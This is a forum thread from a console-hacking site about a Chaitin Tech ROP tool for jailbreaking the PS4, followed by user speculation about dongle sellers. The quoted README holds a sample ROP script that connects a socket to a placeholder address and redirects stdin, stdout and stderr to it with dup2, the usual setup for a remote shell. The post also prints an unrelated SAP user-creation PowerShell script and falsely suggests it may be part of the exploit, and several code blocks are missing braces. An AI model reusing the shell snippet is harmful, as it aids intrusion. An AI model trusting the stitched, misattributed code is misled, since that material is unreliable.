Join Us and become a Member for a Verified Badge to access private areas with the latest PS4 PKGs.
PS4 Jailbreaking       Thread starter PSXHAX       Start date Oct 27, 2016 at 11:35 PM       12      
Not open for further replies.
Following recent research from PlayStation 4 developers into the 4.01 PS4 Jailbreak by Chaitin Tech, today the Chinese PS4 Jailbreaking Team have released an ROP (Return Oriented Programming) tool on their Pro GIT to aid developers in exploiting the PlayStation 4.

Download: / GIT

PSXHAX Moderator @Centrino points out the GIT work is incomplete, referencing line 41 meaning it only contains partial information and nothing can be done with it by end-users just yet.

In other words, although Chaitin Tech are not teasing, they also are not spoon feeding (giving away their full exploit).

Here is a snippet from #ps4dev on iRC via @Fimo for those interested:

[rck`d] the nonsecure browser has no jit, only the secure browser now (used for PSN store, etc) has JIT
[rck`d] Since some version, the internal browser is compiled WITHOUT jit support, and sys_jitshm_xxx seems to be disabled for unprivileged process

:sneaky: Everyone can draw their own conclusions, but thus far it wouldn't surprise me if the Chinese Team is just a 'smoke and mirrors' scheme as dongle douchbags start re-DRMing the exploit to profit off PS4 sceners... then when people whine they'll direct them to this GIT of incomplete code as a 'free' alternative to their useless 'product' but hopefully I'm mistaken. :whistle:

Anyhow, to quote from the PRO: PROgramming ROP like a PRO

This is a crappy tool used in our private PS4 jailbreak. Since some version, the internal browser is compiled WITHOUT jit support, and sys_jitshm_xxx seems to be disabled for unprivileged process. We have to write the kernel exploitation in ROP, like what has been done in HENKaku jailbreak.

pip install git+
If you have modified the pro.g4 file, use the following commands to generate new lexer and parser.
cd pro/parse && antlr4 -no-listener -visitor -Dlanguage=Python2 pro.g4
toy {
    {% include "" %}
    {% include "" %}
    const AF_INET(2);
    const SOCK_STREAM(1);
    const IPPROTO_IP(0);
    var fd;
    func store_rdx_rax<libc, 0x0002e60c, "rdx,rax::">;
    store_rdx_rax(&fd, undefined);
    printf("socket fd = %d\n", fd);
    array addr["\x02\x00\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"];
    connect(fd, addr, 0x10);
    {% for i in range(3): %}
        dup2(fd, {{i}});
    {% endfor %}

A BIG TODO. Just try and learn by yourself.

Quick Guide

All expressions should be evaluated during compilation, Const/Func should be initialized in declaration.

Func is initialized with . Base/Offset is used for relocation, Signature determines the calling convention of Func.

Array can be declared with size(Int) or directly initialized with its content(String).

For loop should be written in template script, it will be rendered before compilation. For more information, check Jinja2.

From on what may be part of the Chaitin PS4 exploit used:
# スクリプト実行パスを取得する関数
# バージョンによって取得する情報を変更する
function Get-ScriptDir() {
    if( $PSVersionTable.PSVersion.Major -ge 3) {
        # Data from $PSScriptRoot
        $ScriptDir = $PSScriptRoot
    else {
        # Data from $MyInvocation.MyCommand.Path
        $ScriptDir = Split-Path $MyInvocation.MyCommand.Path -Parent
    return $ScriptDir

# NetWeaver .Net Connectorのモジュールをロードする関数
function Load-Nco {
    $ScriptDir = Get-ScriptDir

    $Size = [System.IntPtr]::Size
    if ($Size -eq 4) {
        $Path = $ScriptDir + "\x86\"
    elseif ($Size -eq 8) {
        $Path = $ScriptDir + "\x64\"

    [Reflection.Assembly]::LoadFile($Path + "sapnco.dll") > $Null
    [Reflection.Assembly]::LoadFile($Path + "sapnco_utils.dll") > $Null

# -----
# SAPへの接続先を設定する
# -----
Function Get-Destination {
    $cfgParams = New-Object SAP.Middleware.Connector.RfcConfigParameters
    $cfgParams.Add("NAME", "TEST")
    $cfgParams.Add("ASHOST", "ABAP")
    $cfgParams.Add("SYSNR", "00")
    $cfgParams.Add("CLIENT", "400")
    $cfgParams.Add("USER", "User")

    $secPasswd = Read-Host -Prompt "Password" -AsSecureString
    $ptrPasswd = [Runtime.InteropServices.Marshal]::SecureStringToBStr($secPasswd)
    $passwd = [Runtime.InteropServices.Marshal]::PtrToStringBStr($ptrPasswd)
    $cfgParams.Add("PASSWD", $passwd)

    Return [SAP.Middleware.Connector.RfcDestinationManager]::GetDestination($cfgParams)

# ----
# SAP汎用モジュールを実行する
# ----
Function Invoke-SAPFunctionModule {
    $destination = Get-Destination

    # Metadata
    Try {
        [SAP.Middleware.Connector.IRfcFunction]$bapiCreateUser = $destination.Repository.CreateFunction("BAPI_USER_CREATE1")
        [SAP.Middleware.Connector.IRfcFunction]$bapiTransactionCommit = $destination.Repository.CreateFunction("BAPI_TRANSACTION_COMMIT")
    Catch [SAP.Middleware.Connector.RfcBaseException] {
        Write-Host "Failed"

    # Set Import Parameters
    $bapiCreateUser.SetValue("USERNAME", "MYUSER")
    [SAP.Middleware.Connector.IRfcStructure]$imPassword = $bapiCreateUser.GetStructure("PASSWORD")
    $imPassword.SetValue("BAPIPWD", "initial")
    [SAP.Middleware.Connector.IRfcStructure]$imAddress = $bapiCreateUser.GetStructure("ADDRESS")
    $imAddress.SetValue("FIRSTNAME", "My")
    $imAddress.SetValue("LASTNAME", "User")
    $imAddress.SetValue("FULLNAME", "MyUser")

    # Open context
    [SAP.Middleware.Connector.RfcSessionManager]::BeginContext($destination) > $Null

    # 汎用モジュール呼び出し
    Try {
        # ユーザ作成
        [SAP.Middleware.Connector.IRfcTable]$return = $bapiCreateUser.GetTable("RETURN")
        ForEach ($line in $return) {
            Write-Host $line.GetValue("TYPE") "-" $line.GetValue("MESSAGE")
        # コミット
    Finally {
        # クローズ
        [SAP.Middleware.Connector.RfcSessionManager]::EndContext($destination) > $Null

# ----
# メイン関数
# ----
Function Main() {

# ------------------------------
# Main
# ------------------------------

Thanks to @spyro2670 in the Shoutbox and @simobuoncuo for the tip!
Chaitin Tech PS4 Jailbreak ROP Tool.jpg



Staff Member
But dont saying other devs they've got the xploit a few months back?
Rebug's @evilsperm said this a few days back which hints at it:

Scene groups like TRSi also made vague hints on PS4 game decryption in their NFOs but nothing specific about having an exploit themselves.

Unless all they care about is quick cash... if the 'Chinese Team' really exist and this isn't just a charade by dongle makers they would be foolish to settle for dongle money when they could start their own online crowdfunding / kickstarter page and let everyone globally contribute but we'll see what direction it goes in next. ;)


Senior Member
I dont think they are dongle makers... They have also added support for 3.55 and 4.01 linux on the fail0verflow git. But same @failoverflow without an ksploit.

But if one gets released you can use it directly to load linux :)


Senior Member
Remember the dongles/ODEs, after a while some chinese manufacturers made them based on an old discover that nobody used before because of the money required to build the soft and/or hard to make it real and useful.

So, if the ps4 backdoor is software based, chinese are not interested, but if it involve a dongle/chip/flasher/dildo... they can design it, build it and sell it in a minute. Money rules, boys, if some hardware is needed, it cost money and they will sell it well, wat do you spect ??

We can just pray we could pay for it at least or wait for the devs do a big move. Nothing is free this days, everyone involved (devs or factorys) are wasting time and money to do whatever they can.

Too many unclear things around this "ps4 scene", i dont like it.


Senior Member
@PLAYER 1 Also i think if some Dongle will pop up our devs will instantly pwn the device and give it to us 4 free :)
The most from them are also hating reDRM devices :)

There is also good Hardware like the E3 flasher but they also let it look bad because with their fw you can only use it on one ps3 ^^ Idiots...
Not open for further replies.